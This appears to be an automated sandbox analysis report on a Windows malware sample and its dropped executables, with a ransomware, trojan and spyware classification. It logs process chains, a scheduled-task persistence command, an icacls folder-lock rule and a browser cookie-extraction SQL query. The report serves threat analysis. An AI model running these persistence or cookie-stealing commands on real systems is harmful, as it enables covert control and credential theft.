Source: build2.exe.19.dr	Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: build2[1].exe.19.dr	Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: 01860199.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: D804.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C861.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: B46F.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: F4F7.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: A170.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: CBE6.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: B8C8.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: A3D5.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 673.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EA44.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: D689.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 388B.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BC2.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 57DC.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3E02.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 913F.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hwgujdv.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ewgujdv.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: D804.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 01860199.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hwgujdv

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@76/330@105/23

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: B46F.exe, 0000001A.00000002.490522313.000000000342C000.00000004.00000010.00020000.00000000.sdmp

Binary or memory string: S.slNq

Source: 01860199.exe	ReversingLabs: Detection: 37%
Source: 01860199.exe	Virustotal: Detection: 38%

Source: C:\Users\user\Desktop\01860199.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\01860199.exe C:\Users\user\Desktop\01860199.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hwgujdv C:\Users\user\AppData\Roaming\hwgujdv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C861.exe C:\Users\user\AppData\Local\Temp\C861.exe
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68
Source: C:\Users\user\AppData\Local\Temp\C861.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 68 -s 520
Source: unknown	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3C54.exe C:\Users\user\AppData\Local\Temp\3C54.exe
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\NewPlayer.exe "C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Process created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe"
Source: C:\Users\user\Desktop\01860199.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe	Process created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe "C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Process created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F4F7.exe C:\Users\user\AppData\Local\Temp\F4F7.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5DA0.exe C:\Users\user\AppData\Local\Temp\5DA0.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C861.exe C:\Users\user\AppData\Local\Temp\C861.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3C54.exe C:\Users\user\AppData\Local\Temp\3C54.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F4F7.exe C:\Users\user\AppData\Local\Temp\F4F7.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5DA0.exe C:\Users\user\AppData\Local\Temp\5DA0.exe
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C861.exe C:\Users\user\AppData\Local\Temp\C861.exe
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\NewPlayer.exe "C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe	Process created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe "C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Process created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Process created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C120DE80-FDE4-49f5-A713-E902EF062B8A}\InProcServer32

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\D804.tmp

Jump to behavior

Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.563228419.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;U/
Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: aafg31.exe, 00000015.00000003.509760935.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2901A6000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.563228419.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.511247742.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;pf":"b52%,L
Source: aafg31.exe, 00000015.00000003.509760935.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.511247742.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;3ruyIBy79Jhn2KD0MAHndkY5HfXu3FjrUGsXNx+JmqknGWU3y9lQI954Uudblbq3uoFSjReAoFdDgjV4N7oqNL5VJJqg3EYSBvO5Kx47gKSQb2MsIi4GPGwN2iMeKnQ6xbYHfT5EdLH4/NAxqDRgOa1UR+4PTom6c98B13N2A7ORixlv67W5j7NZ8EATp03Hpn9wtWI/ew/j5mPxU6^
Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;ce3":2623,"machinee,
Source: aafg31.exe, 00000015.00000002.618169870.000001E2901A6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;uV
Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;YqQj2ohortname":"

Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: 5_2_024A57C6 CreateToolhelp32Snapshot,Module32First,

Source: 3C54.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
Source: 5DA0.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
Source: 6FA9.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
Source: 9F31.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:1868:64:WilError_01
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess68
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Command line argument: T#0y
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Command line argument: #"#
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Command line argument: .d\|1
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Command line argument: K[
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Command line argument: kernel32.dll

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File read: C:\Windows\System32\drivers\etc\hosts
